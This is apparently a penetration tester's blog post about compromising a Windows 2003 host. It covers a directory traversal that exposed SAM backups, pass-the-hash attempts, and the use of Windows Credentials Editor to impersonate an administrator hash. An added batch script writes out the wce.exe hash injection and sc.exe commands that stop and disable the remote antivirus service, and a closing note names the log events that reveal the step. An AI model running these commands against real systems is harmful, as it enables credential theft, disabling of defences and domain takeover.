Recently I took part in an internal penetration test in which a directory traversal vulnerability was found in a management application hosted on a Windows 2003 server. It quickly became apparent that the application was installed on the system drive, from where it was possible to locate the backup SAM and SYSTEM files in C:\Windows\repair. The files were downloaded and imported into Ophcrack, which showed that only the NT hash was present (no LM hash), so Ophcrack was left to work away for a few hours in the background, but without many expectations. The next step was to use Keimpx to pass the hash around the network in an attempt to locate other systems sharing the same local administrator credentials; unfortunately no matches were found. Finally the hash was fed to the psexec module in Metasploit, but after numerous attempts to exploit the system it soon became clear that the antivirus was performing well and blocking every attempt, even when testing with several different payloads. After a little experimenting I remembered that Windows Credentials Editor (WCE) has an option to change the NTLM credentials of the current logon session, so essentially a user can run commands/programs in the context of another user if we have only the hash.
The following is an example of this command usage (for a local account, the domain field is the name of the system the account belongs to):
wce -s username:system_name_or_domain:LMHASH:NTHASH -c command_to_run
We ran the above command on our local system and chose to load an MMC console, from which the Services snap-in was connected to the remote system. It was then possible to stop the antivirus service and continue with psexec to compromise the system as originally intended. Luckily for us this entry point ultimately led to the compromise of the entire Windows domain.
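As an added example (not the author's actual commands), the same technique scripted from a cmd prompt: WCE swaps the NTLM credentials of the current session, and sc.exe is used over RPC instead of the Services MMC snap-in to query and stop the remote service. The target name TARGET01, the service name AVSERVICE and the NT hash are placeholders; it assumes wce.exe sits in the current directory and that wce's -c option accepts a full command line (program plus arguments), which is also an assumption.

```batch
@echo off
REM Added example, not the original post's commands. Placeholders: TARGET01,
REM AVSERVICE and the NT hash. Assumes wce.exe is in the current directory and
REM the target accepts SMB/RPC (TCP 445/135) from this machine.
set TARGET=TARGET01
set USER=Administrator
REM LM hash of an empty/disabled LM password, used because only the NT hash was available.
set LMHASH=aad3b435b51404eeaad3b435b51404ee
set NTHASH=<32-hex-char NT hash recovered from %SystemRoot%\repair\SAM>
set SVC=AVSERVICE

REM -s replaces the NTLM credentials of the current logon session with the
REM supplied ones; for a local account the "domain" field is the target's
REM machine name. -c launches the program under those credentials. cmd.exe /k
REM keeps the new window open and first lists the remote services so you can
REM confirm the hash is accepted and read the real service name.
wce.exe -s %USER%:%TARGET%:%LMHASH%:%NTHASH% -c "cmd.exe /k sc \\%TARGET% query state= all"

REM Run inside the spawned cmd.exe (equivalent to the Services snap-in actions).
REM Note the space after "state=" / "start=": sc.exe requires it.
REM   sc \\%TARGET% queryex %SVC%
REM   sc \\%TARGET% stop %SVC%
REM   sc \\%TARGET% config %SVC% start= disabled
```

Stopping the service this way writes a Service Control Manager event (ID 7036, "entered the stopped state") to the target's System log, and a remote SCM connection authenticates with the injected hash, so a network logon for the account appears in the Security log; defenders watching for antivirus services stopping on servers will see exactly this step.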
Another point goes to WCE.